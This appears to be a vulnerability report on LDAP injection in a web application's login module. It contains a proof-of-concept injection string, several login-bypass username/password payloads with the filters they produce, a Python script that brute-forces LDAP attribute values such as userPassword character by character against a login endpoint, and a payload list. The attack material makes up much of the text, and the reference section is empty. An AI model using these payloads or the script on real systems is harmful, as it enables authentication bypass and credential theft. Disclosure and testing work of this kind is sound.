Summary:

This vulnerability has the potential to cause data leaking, unauthorised access, and other major security problems. To safeguard user data and system integrity, we firmly advise that this problem be given prompt attention and resolution.

Vulnerability Details:

LDAP (Lightweight Directory Access Protocol) injection is a code injection technique that occurs when untrusted user input is directly included in an LDAP query without proper sanitization or validation.

The target application failed to adequately validate user-supplied input, leading to a potential LDAP injection vulnerability.

An attacker can use this weakness to alter LDAP queries, evade authentication checks, obtain unauthorised access to confidential data, or carry out harmful deeds.

Affected Component:

The LDAP injection vulnerability affects the authentication module of the web application, specifically the code responsible for processing user credentials and authenticating against an LDAP server.

Steps to Reproduce:

1. Identify a field within the application that interacts with LDAP queries.
2. Craft a malicious input containing LDAP metacharacters, such as parentheses, asterisks, or backslashes.
3. Submit the input and observe the response from the application.
4. Note any unexpected behavior, error messages, or unusual data retrieval.

Proof of Concept:

1. The application allows a user to log in using their username and password.
2. The application constructs an LDAP query using the provided username without proper input validation.
3. An attacker provides the following input in the username field: “)(cn=))(|(uid=))(|(objectClass=*”
4. The resulting LDAP query becomes: “(&(cn=))(|(uid=))(|(objectClass=*))(userpassword=[provided password])”
5. The attacker gains unauthorized access and potentially retrieves sensitive information or performs other malicious actions.

Login Bypass:

user=*
password=*
--> (&(user=*)(password=*))

user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))

user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))

user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed

username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.

username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))

Discover valid LDAP fields

LDAP objects provide various properties by default that can be used to preserve data. You can attempt brute-forcing all of them to get that information. There is a list of default LDAP attributes here.

#!/usr/bin/python3
import requests
import string
from time import sleep
import sys
proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]
for attribute in attributes: #Extract all attributes
    value = ""
    finish = False
    while not finish:
        for char in alphabet: #In each possition test each possible printable char
            query = f"*)({attribute}={value}{char}*"
            data = {'login':query, 'password':'bla'}
            r = requests.post(url, data=data, proxies=proxy)
            sys.stdout.write(f"\r{attribute}: {value}{char}")
            #sleep(0.5) #Avoid brute-force bans
            if "Cannot login" in r.text:
                value += str(char)
                break
            if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
                finish = True
                print()

Payloads:

*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y

Reference:

Impact:

An attacker can use this flaw to change the format of an LDAP query and issue any LDAP commands they like.

The consequences might include unauthorised access to private data, data manipulation, or even remote code execution, depending on the rights attached to the LDAP service account.

The security and privacy of the target application might be seriously jeopardised if this vulnerability were to be effectively exploited.